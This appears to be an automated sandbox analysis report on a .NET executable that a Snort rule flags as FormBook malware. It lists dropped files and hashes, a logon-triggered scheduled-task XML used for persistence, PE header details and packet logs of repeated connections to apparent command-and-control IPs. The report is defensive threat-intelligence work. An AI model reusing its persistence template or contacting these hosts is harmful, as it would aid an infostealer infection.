                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tx405a3h.jak.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjrwqotj.p5x.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ws5jvolc.gis.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmpB59F.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12232738037069
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaNoxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                              MD5:529B0B1CD17CAB2A54AB8848035CA804
                                              SHA1:EA034189827C60F6E806E83C7A5F76436945EEB1
                                              SHA-256:F97047DC69F35E0F7B87AB05A3F7796626173D2E129C189622E6F7A848DAF1F6
                                              SHA-512:67E0B4962192654D278F09FA89E098B5AB598ECF2528DFDE541687B772F934D6F0BB7C95A8AEA98B429D7574C9DC873647FFCF19F270CE6B9B2ADD2FAB5FBC56
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12232738037069
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaNoxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                              MD5:529B0B1CD17CAB2A54AB8848035CA804
                                              SHA1:EA034189827C60F6E806E83C7A5F76436945EEB1
                                              SHA-256:F97047DC69F35E0F7B87AB05A3F7796626173D2E129C189622E6F7A848DAF1F6
                                              SHA-512:67E0B4962192654D278F09FA89E098B5AB598ECF2528DFDE541687B772F934D6F0BB7C95A8AEA98B429D7574C9DC873647FFCF19F270CE6B9B2ADD2FAB5FBC56
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):744448
                                              Entropy (8bit):7.909409154134137
                                              Encrypted:false
                                              SSDEEP:12288:UlTSDzsi9gxS6GxNqPMryBhXVU5esCmYY7nlVIOehCD6W0M+HnwDNPy66x1cngCh:UlTSDD9D6Gh+Bs8sCYnlWOsCr+Y4x1t0
                                              MD5:5CB7ACEF6FCB2F9FEED94483F364030A
                                              SHA1:68470B83C29C96C569ED5DB44668FE6286C1230C
                                              SHA-256:C6AF34274BA09E990BDBC008C74F95F935BA6D256ED23EE8C67EA06530C8C0EA
                                              SHA-512:938CE6946F21D9D266E10D2A80B5B3E107CADBC18183DD1326A107A5E34D18BF2E8FF272279D2FFF38A3C6A73BC60F02F3E06E26B22CACAE38AD16775C35947F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 34%
                                              • Antivirus: Virustotal, Detection: 32%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................0..R..........jq... ........@.. ....................................@..................................q..O...................................HF..p............................................ ............... ..H............text...pQ... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B................Kq......H...........j...........(..P...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*...s....}......(...... ... ....s....(......r...po.....*^..}.....(.......(.....*..0..>........r...p.s.....(.....+...{....o.....rC..po....o....&..o......-.*...0...........rW..p.s.....(......{....o ...o!....+~..r...po....o"...s#.....o$....rC..po....o"...o%...&.o$....r...po....o"...o%...&.o$....r...po....o"...o%...&.{....o ....o&.

                                              C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.909409154134137
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:jlsvOH1c8bSRKqM.exe
                                              File size:744'448 bytes
                                              MD5:5cb7acef6fcb2f9feed94483f364030a
                                              SHA1:68470b83c29c96c569ed5db44668fe6286c1230c
                                              SHA256:c6af34274ba09e990bdbc008c74f95f935ba6d256ed23ee8c67ea06530c8c0ea
                                              SHA512:938ce6946f21d9d266e10d2a80b5b3e107cadbc18183dd1326a107a5e34d18bf2e8ff272279d2fff38a3c6a73bc60f02f3e06e26b22cacae38ad16775c35947f
                                              SSDEEP:12288:UlTSDzsi9gxS6GxNqPMryBhXVU5esCmYY7nlVIOehCD6W0M+HnwDNPy66x1cngCh:UlTSDD9D6Gh+Bs8sCYnlWOsCr+Y4x1t0
                                              TLSH:51F4129073FD2B06C9FD97F648A4128947BA610F75B5E39D2CC3A1DB04A2F401AA1F5B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................0..R..........jq... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:90cececece8e8eb0

                                              Static PE Info

                                              General

                                              Entrypoint:0x4b716a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xB0A7146F [Sat Dec 1 13:02:39 2063 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb71170x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x5cc.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb46480x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb51700xb5200becfbd48cf234d57200a9c25367a855eFalse0.9303142792443064data7.9159393452530775IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb80000x5cc0x600f5864a393e3e99f4e157bc2c6ca742ebFalse0.4270833333333333data4.1277406997876955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xba0000xc0x20047484824d77df065490608b486027e8bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xb80900x33cdata0.42632850241545894
                                              RT_MANIFEST0xb83dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              07/08/24-09:33:28.821901TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974180192.168.2.43.33.130.190

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 8, 2024 09:33:28.813822031 CEST4974180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:28.818675041 CEST80497413.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:28.818742990 CEST4974180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:28.821901083 CEST4974180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:28.826702118 CEST80497413.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:29.289864063 CEST80497413.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:29.289886951 CEST80497413.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:29.290072918 CEST4974180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:29.295937061 CEST4974180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:29.300730944 CEST80497413.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:44.845288992 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:44.851012945 CEST8049742199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:44.851125956 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:44.853055954 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:44.857932091 CEST8049742199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:45.323097944 CEST8049742199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:45.323472977 CEST8049742199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:45.323523045 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:45.323941946 CEST8049742199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:45.323991060 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:46.358458996 CEST4974280192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:47.377326965 CEST4974380192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:47.382337093 CEST8049743199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:47.382440090 CEST4974380192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:47.384155035 CEST4974380192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:47.388971090 CEST8049743199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:47.856290102 CEST8049743199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:47.856857061 CEST8049743199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:47.856868982 CEST8049743199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:47.856920004 CEST4974380192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:48.889695883 CEST4974380192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:49.908744097 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:49.913821936 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.913988113 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:49.916208029 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:49.921056986 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921184063 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921194077 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921204090 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921212912 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921309948 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921319008 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.921936035 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:49.922619104 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:50.375546932 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:50.375857115 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:50.375873089 CEST8049744199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:50.375917912 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:50.375983953 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:51.420939922 CEST4974480192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.439687967 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.444653034 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:52.444766998 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.446778059 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.451580048 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:52.943339109 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:52.943762064 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:52.943774939 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:52.943871021 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.943933964 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.946696997 CEST4974580192.168.2.4199.59.243.226
                                              Jul 8, 2024 09:33:52.951890945 CEST8049745199.59.243.226192.168.2.4
                                              Jul 8, 2024 09:33:57.970915079 CEST4974780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:57.977571011 CEST80497473.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:57.977644920 CEST4974780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:57.979538918 CEST4974780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:57.984401941 CEST80497473.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:59.395629883 CEST80497473.33.130.190192.168.2.4
                                              Jul 8, 2024 09:33:59.395737886 CEST4974780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:59.483434916 CEST4974780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:33:59.488295078 CEST80497473.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:00.502471924 CEST4974880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:00.507571936 CEST80497483.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:00.507663012 CEST4974880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:00.509536028 CEST4974880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:00.514497042 CEST80497483.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:00.986180067 CEST80497483.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:00.988800049 CEST4974880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:02.014842987 CEST4974880192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:02.020342112 CEST80497483.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.033500910 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:03.039324045 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.039422035 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:03.041343927 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:03.046169996 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046209097 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046217918 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046292067 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046302080 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046309948 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046463013 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046471119 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046478987 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:04.456258059 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:04.456497908 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:04.546000004 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:04.551048040 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:05.564834118 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.569979906 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:05.570096016 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.572886944 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.577817917 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033412933 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033469915 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033842087 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:13.036526918 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:13.042742968 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.238712072 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.245183945 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.245302916 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.247215033 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.252165079 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.709741116 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.710063934 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:19.749042988 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:19.753885031 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:20.768003941 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.772919893 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:20.773010969 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.774857044 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.779666901 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:22.354640007 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:22.360168934 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:22.360225916 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.361689091 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.366638899 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.368724108 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.371140003 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.375931025 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.375993967 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376003981 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376055956 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376121044 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376149893 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376159906 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376241922 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376251936 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.834151030 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.834206104 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:24.874037027 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:24.878917933 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:25.894172907 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:25.899195910 CEST80497543.33.130.190192.168.2.4
